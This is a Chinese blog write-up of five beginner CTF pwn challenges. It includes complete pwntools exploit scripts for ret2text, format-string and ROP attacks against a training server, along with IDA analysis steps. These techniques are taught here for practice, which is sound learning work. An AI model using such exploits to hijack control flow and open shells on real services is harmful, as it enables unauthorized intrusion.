pwn的五道基础题

最新推荐文章于 2024-06-05 16:45:03 发布
最新推荐文章于 2024-06-05 16:45:03 发布
阅读量6.9k 收藏 72
点赞数 9
分类专栏: CTF 文章标签: python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lllwky/article/details/123782087
版权

文章目录

一:ret2text

from pwn import *
context.arch="amd64"
io=remote("101.34.90.86",10002)
secure_addr=0x400852
payload=b"a"*0x10+b"a"*0x8+p64(secure_addr)
io.sendlineafter("name",payload)
io.interactive()

我们需要获取四个部分

1:服务器地址与端口号

题目会直接给你,比如这道题目的地址为node2.zjnuoj.com,端口号为38011,对应上述脚本的io=remote(“101.34.90.86”,10002)

image-20220327113125324

如果你不想填入域名,而想填入端口号,打开cmd,输入ping node2.zjnuoj.com即可获得

2:传入参数

一般ret2text会有一个接收参数的方法,我们需要使传入的参数大于他自定义的参数范围既可pwn穿。

将ret2text文件拖入IDA中,找到main函数后双击
在这里插入图片描述

按F5反汇编

在这里插入图片描述

找到三个方法后都点进去看看

image-20220327114034802

观察到是get接收,同时问题是tell me your name,所以其中有个参数为name,则填入

io.sendlineafter(“name”,payload)

如果问的问题是:tell me anything,则填入的参数为:

io.sendlineafter("?",payload)

3:参数的接收范围

我们发现范围是0-10h,则我们填入payload=b"a"*0x10+b"a"*0x8+p64(secure_addr)

在这里插入图片描述

如果我们发现范围为1-64h,则我们填入:payload=b"a"*0x64+b"a"*0x8+p64(secure_addr)

4:找到bin/sh所在的地址

按Shift+F12进行全局搜索

image-20220327115322933

image-20220327115439615

发现在backdoor方法里

我们在左边的边框找到backdoor

image-20220327120030683

点进去

image-20220327120052870

然后按tab键,有时候按tab+空格键

image-20220327120236932

找到地址为400852,填入

secure_addr=0x400852

将脚本拖到虚拟机中,在此处打开终端,输入

python3 exp.py

image-20220327120421672

cat flag.txt即可获得flag

二:your_nc

先运行一下试试

端口号题目给出了:101.34.90.86 10004

在这里插入图片描述

这个题目没什么原则,运行一下就发现可以进入了,然后直接ls再cat一下就好了

三:overflow

这个题目的端口号为:101.34.90.86 10000

我们还是把他拖到IDA中

image-20220327160915681

我们分析代码,看到scanf知道题目要我们输入两个参数v5和v4,unsigned表示无符号数》1表示右移一位,右移表示除以2,abs表示取绝对值

所以v6的值为(v4+v5)/2+|(v5-v4)|/2,注意前为无符号,后为有符号

所以其实v6就是求两者的最大值

如果输入的数不是整数,则返回too young

然后令v7=v5*v4

如果v6等于v7,则返回一个假的flag,如果v6<=v7,则返回Well…but where is the flag?

所以得到flag当然需要v6>v7

我们又知道,负数的无符号数要大于正数的无符号数

因为负数的无符号数为1XXXXXXX

而正数的无符号数为0XXXXXXX

所以我们只需要输入两个数字,两个数字都为负数即可。

image-20220327163209186

四:printf

端口号:101.34.90.86 10001

from pwn import *

context.arch="amd64"

io=remote("101.34.90.86",10001)
# io =process("./printf")

sth_addr=0x60108C

io.recvuntil("Give me something to printf:")
# 6表示字符串偏移,将sth_addr改为114514
payload = fmtstr_payload(6,{sth_addr:114514})
io.send(payload)

io.interactive()

1:找到如何进入/bin/sh

首先还是观察一下main函数image-20220327181723176

函数告诉我们当sth==114514时我们可以进入bin/sh

2:找到sth的地址

我们直接点进去发现60108C是sth的地址

image-20220327182335124

3:获得格式化字符串的偏移量

首先运行文件输入./printf

发现权限不够,则输入chmod 777 printf

然后输入aaaaaaaaaaa-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p

image-20220327184226423

我们数一数发现a到0x61(包括0x61)的有6个偏移量

则payload = fmtstr_payload(6,{sth_addr:114514})

将exp拖入虚拟机中运行

image-20220327184743566

五:rop

端口号为:“101.34.90.86”,10003

脚本:

from pwn import *

context.arch="amd64"

io=remote("101.34.90.86",10003)
# io =process("./rop")
elf=ELF("./rop")

# 表示全局搜索elf文件中名称为“system”的函数
system_addr=elf.sym["system"]

# \x00表示字符串中止标记,即找到含有sh的字符串,b是字符串标记
# elf.search表示获得含有sh字符串地址的列表,next表示获得列表中的第一个地址
sh_addr=next(elf.search(b"sh\x00"))

# asm表示将“pop rdi;ret”编译为二进制代码
pop_rdi_ret=next(elf.search(asm("pop rdi; ret")))
# 获得含有return的地址
ret_addr=next(elf.search(asm("ret")))

# bi0xbi0x表示八个字节的占位符,也可以写成0x8
# p64(ret_addr)是为了补充位数,没有其他特别含义
payload = b"b"*0x20+b"bi0xbi0x"+p64(ret_addr)
# p64表示翻译为0与1,进行字符串+即执行每个地址对应的指令
payload+=p64(pop_rdi_ret)+p64(sh_addr)+p64(system_addr)


io.sendline(payload)

io.interactive()

我们还是在IDA中打开,双击查看mian。然后F5反汇编

image-20220327202821089

每个函数都查看一下发现:

在这里插入图片描述

这个就是在告诉我们偏移地址

payload = b"b"*0x20+b"bi0xbi0x"+p64(ret_addr)

同时我们需要找到/bin/sh文件的位置,按shift+f12,发现没有/bin/sh,但是有/bin/woodwhale

在这里插入图片描述

所以我们接下俩的操作为:

1:获取代码中任意一个函数的地址

system_addr=elf.sym[“system”]

2:获取含有sh的字符串的地址

sh_addr=next(elf.search(b"sh\x00"))

3:获得pop rdi ret的地址

pop_rdi_ret=next(elf.search(asm(“pop rdi; ret”)))

所以这个题目我们需要干什么呢?

我们希望执行/bin/sh来进入对方的终端,但是我们并不知道/bin/sh的地址,但是我们可以找到一个函数,然后在函数中传入sh这个参数,这样我们就相当于执行/bin/sh了,那我们怎么往函数中传入参数呢。

首先我们获得sh这个字符串的地址,然后执行pop rdi ret。pop rdi是指将sh存放进入rdi中,同时rip这个指针指向sh。但是pop会导致sh不在程序执行流,所以要加一个ret,来回到程序执行流,最后我们使用p64(system_addr)来执行system即执行/bin/sh

在虚拟机中执行

image-20220327211049644

拓展:

1:为什么使用rdi

因为我们需要用到寄存器来存放地址,除了rdi以外我们还可以使用rsi rdx rcx r8 r9

2:获取地址有没有其他方式

我们上文中获取地址是通过pop_rdi_ret=next(elf.search(asm(“pop rdi; ret”)))

其实我们也可以直接获得pop rdi ret这个操作的地址

在这里插入图片描述

image-20220327211653561

所以我们也可以直接写成

pop_rdi_ret=0x00000000004008d3

image-20220327211952228
没有其他方式

我们上文中获取地址是通过pop_rdi_ret=next(elf.search(asm(“pop rdi; ret”)))

其实我们也可以直接获得pop rdi ret这个操作的地址

在这里插入图片描述
在这里插入图片描述

pop_rdi_ret=0x00000000004008d3

在这里插入图片描述

sheepbotany
关注
  • 9
    点赞
  • 72
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一道pwn入门的练习
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
PWN测试题目
07-18
信息安全PWN测试题目:用于CTF的练习与PWN的学习,测试题目
攻防世界XCTF-Pwn入门11报告
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
06-05 725
如果你也想学习:黑客&网络安全的零基础攻防教程Pwn是CTF中至关重要的项目,一般来说都是Linux二进制题目,零基础的同学可以看《程序员的自我修养》,主要型包括:缓冲区溢出、Return to Libc、格式化字符串、PLT GOT等。
学校的简单入门PWN
EternalBurning的博客
11-09 557
学校的简单入门PWN0x00 first try0x01 easy_second_try0x02 printf 0x00 first try exeinfo打开看一下,是32位的 看看有没有程序保护,估计是入门的缘故都没有程序保护: 用32位的ida打开, 要想拿到shell,就得让v6==99,而第11行的read()明显存在栈溢出,双击变量进入函数的栈界面 容易发现,s字符串的长度...
pwn练习
WuMing_Z的博客
02-23 1108
程序分析:main函数中只存在system("/bin/sh")函数,所以nc可直接拿到权限)nc指令:远程连接对方服务器,对方服务器有什么程序就会执行什么程序nc(ip + 端口号)例如在已给的靶机信息node5.buuoj.cn:29650中node5.buuoj.cn是域名,冒号后的29650是端口号(注意冒号要改为空格)然后直接cat flag 即可。
攻防世界hello pwn WP(pwn入门基础
m0_62584974的博客
11-21 2088
攻防世界hello pwn WP(pwn入门基础)的简单讲解
pwn入门刷——starting(1)
qq_44302282的博客
05-05 324
level0 题目来源:攻防世界—level0 链接:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5053&page=1 1、首先,执行基本步骤(前面已经说过了),看图 2、 接下来,打开64位的ida 3、在左边的函数窗口里面找到main函数,打开它,tab键可以切换反...
pwn栈溢出10道练习有writeup
01-04
在这个场景中,"pwn栈溢出10道练习有writeup" 提供了10个关于栈溢出的实战练习,每个题目都配有详细的解答,这对于学习和理解栈溢出漏洞原理及其利用技术非常有帮助。 栈溢出是由于程序在栈上分配的内存不足,...
Ctfshow pwn 02(自己做出的第一道pwn
weixin_64875092的博客
12-05 5313
算是一篇第一次做出pwn的日记了! 本文写给想要入门pwn但只安装好虚拟机和ida完全不知道怎么用的小白~ 有许多写的不严谨或无脑的地方请多包涵! 其中有许多我在做时踩到的坑(因为自己零基础实在不知道怎么问也不知道去问谁而导致浪费好多时间而进行不下去) 现在开始! 首先第一步,来到ctfshow的网站,找到这道pwn02 之后点击Launch an instance(这所是一个建立连接的步骤,少了这一步在使用python3时会出现如下报错)如果问我什么是python3,请耐心看下去
CTFSHOW-PWN入门-前置基础(pwn5-pwn12)
2402_84133101的博客
04-13 399
mov eax,[esi]将esi中的值作为地址,然后将该地址单元的值赋给eax,即找到080490E8地址单元中的值赋给eax。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov eax,[ecx]将ecx寄存器的值作为地址,将该地址单元中的值赋给eax。
1.pwn基础总结
热门推荐
admin的博客
10-03 1万+
Int_overflow # Int_overflow context(log_level='debug', os='Linux', arch='amd64') p = remote("pwn.blackbird.wang", 9501) payload = "2147483648" p.sendlineafter("Input an int ( <0 )\n", payload) p.interactive() ret2text from pwn import * conte.
pwn100题目文件及exp.zip
08-09
栈溢出漏洞,没有system函数下需要使用DynELF函数来泄漏函数地址,本资源是利用read和puts函数来进行泄漏
PWN基础知识总结
丰年留客的专栏
03-29 1613
0x00 Intro 这里记录一些在CTF PWN题目经常要考虑的技术点,是一些与C/ASM相关,比较底层的东西。总结来说有: C和汇编之间的参数传递 栈的细节 64位程序参数传递 只有对这些细节都清楚了,那么利用时,如何构造Payload就没有想象中那么困难了。这里目前还是只限于x86-64架构。 0x01 C和汇编之间的参数传递 有编译器基础的都知道,GCC将C语言编译为机器语言中间有几个过程。 预处理(将宏展开) 汇编(将C代码转为汇编代码) 编译(将汇编转为机器码) 链接(将静态库,多个源文
LCTF pwn题目
Tesi1a的充电桩
11-25 562
题目 URL SOLVED easy_heap Writeup: https://github.com/LCTF/LCTF2018/tree/master/Writeup/easy_heap Source: https://github.com/LCTF/LCTF2018/tree/master/Source/easy_heap 17 pwn4fun Writeup: https://github...
VMPWN的入门级别题目详解(一)
蚁景网安学院
07-26 1194
这是一道基础的VM相关题目,VMPWN的入门级别题目。前面提到VMPWN一般都是接收字节码然后对字节码进行解析,但是这道题目不接受字节码,它接收字节码的更高一级语言:汇编。程序直接接收类似”mov”、”add”之类的指令,可以把这道题目看作是一个执行汇编语言的处理器,相比于解析字节码的VM,逆向难度要大大减小。非常适合入门。
攻防世界pwn入门(一)
qq_43774856的博客
12-23 833
get_shell 直接连接目标主机,输入ls /,cat flag就得到flag when_did_you_born 先检查一下文件的基本信息 发现是64位可执行文件,并且没有PIE保护 运行一下文件 拖进ida看看 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { __int64 result; // rax char v4; // [rsp+0h] [rbp-20h] unsigned int v5; // [r
pwn入门刷——starting
qq_44302282的博客
05-04 1745
运行就能拿到shell呢,真的 题目来源:攻防世界------运行就能拿到shell呢,真的 链接:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5049&page=1 先从最简单的入手(虽然我先刷的不是这道,emmmm) (作为小白,刚开始的这些步骤我真的不知道,所以我...
新手打pwn
m0_74736832的博客
07-05 1081
攻击者可以使用格式化字符串的特性,将一个特定的值写入到可以修改canary的位置上,从而绕过检测。它是C语言中的标准函数库,提供了各种基础函数和数据类型的定义,以及多个常用功能的实现。弹出时的数据顺序:由于栈的"先进后出"原则,"pop"指令弹出的数据顺序与它们被"push"到栈中的顺序相反。当使用"pop"指令弹出数据时,栈指针会自动向下移动,指向新的栈顶位置。x86架构(如Intel和AMD处理器)中的"pop"指令:在x86汇编语言中,"pop"指令用于将栈顶的数据弹出并存储到目标操作数中。
PWN入门刷——BUUCTF(1-4)
ChenD的学习笔记
09-23 666
最近为了学校组织的ctf比赛才开始接触pwn的刚刚做了十多道现在来记录一下,记录完了接着学后面贼难的内容!
pwn栈溢出题目归纳
08-30
这道pwn栈溢出题目归纳如下: 1. 与其他题目不同的地方是会对内容进行与(&)或(|)操作并泄露一个低12位(buf地址的后3个字节)。 2. 猜测思路是泄露unsorted bin地址,计算malloc_hook地址并将shell写入malloc hook,主要漏洞是栈溢出。 3. 堆溢出是关键,需要检查输入函数的逻辑、变量类型(是否存在无符号溢出)、函数特征(如strcpy)以及读入函数逻辑中是否存在溢出漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [BUUCTF PWN-堆总结 2021-09-27](https://blog.csdn.net/m0_56897090/article/details/120510003)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值